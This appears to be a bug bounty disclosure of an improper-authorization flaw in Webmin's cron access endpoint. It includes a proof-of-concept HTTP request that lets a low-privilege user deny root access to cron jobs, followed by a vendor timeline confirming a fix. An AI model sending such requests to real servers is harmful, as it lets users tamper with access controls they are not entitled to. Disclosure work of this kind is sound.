Improper Authorization in webmin/webmin


Reported on

Feb 17th 2022


The /cron/save_allow.cgi endpoint is accessible to any authenticated low privilege users resulting in controlling user access to cron jobs. They could allow and deny other users access to cron jobs affecting the Scheduled Cron Jobs module.

Proof of Concept

Affected Endpoint:

GET http://{HOST}/cron/save_allow.cgi



*** This example request to deny root to access cron.

GET /cron/save_allow.cgi?allow=&mode=2&deny=root HTTP/1.1
Host: jumphost:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-no-links: 1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: save_allow.cgi
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://jumphost:10000/cron/edit_allow.cgi?xnavigation=1
Cookie: redirect=1; testing=1; sid=092a4f34132757770ba9c9c353760197


This vulnerability is capable of modifying or restricting access to a system function outside the user's limits.

We are processing your report and will contact the webmin team within 24 hours. 3 months ago
We have contacted a member of the webmin team and are waiting to hear back 3 months ago
webmin validated this vulnerability 3 months ago
Faisal Fs has been awarded the disclosure bounty
The fix bounty is now up for grabs
webmin confirmed that a fix has been merged on eeeea3 3 months ago
The fix bounty has been dropped
save_allow.cgi#L5-L17 has been validated
to join this conversation